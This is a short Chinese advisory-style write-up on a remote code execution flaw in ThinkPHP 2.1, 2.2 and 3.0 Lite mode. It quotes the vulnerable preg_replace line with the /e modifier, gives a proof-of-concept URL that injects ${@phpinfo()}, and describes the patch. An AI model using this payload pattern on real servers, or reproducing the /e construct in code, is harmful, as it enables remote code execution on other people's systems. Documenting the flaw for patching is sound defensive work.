在开启了Lite模式后，在ThinkPHP/extend/Mode/Lite/Dispatcher.class.php中第73行：

// 解析剩余的URL参数
 $res = preg_replace(‘@(\w+)‘.$depr.‘([^‘.$depr.‘\/]+)@e‘, ‘$var[\‘\\1\‘]=“\\2\;”‘, implode($depr,$paths));

有两点：一是加入了preg_replace使用了e修饰符，二是‘$var[\‘\\1\‘]="\\2\;"‘中双引号中的PHP代码可以直接被执行。

比如：

http://localhost/index.php/Index/index/name/$%7B@phpinfo%28%29%7D

就会执行phpinfo()函数，打印出phpinfo页。

预防：

官方已经给出了补丁，也可以自行将双引号改成单引号防止PHP代码被解析。

ThinkPHP 框架2.1，2.2和3.0版本URL命令执行漏洞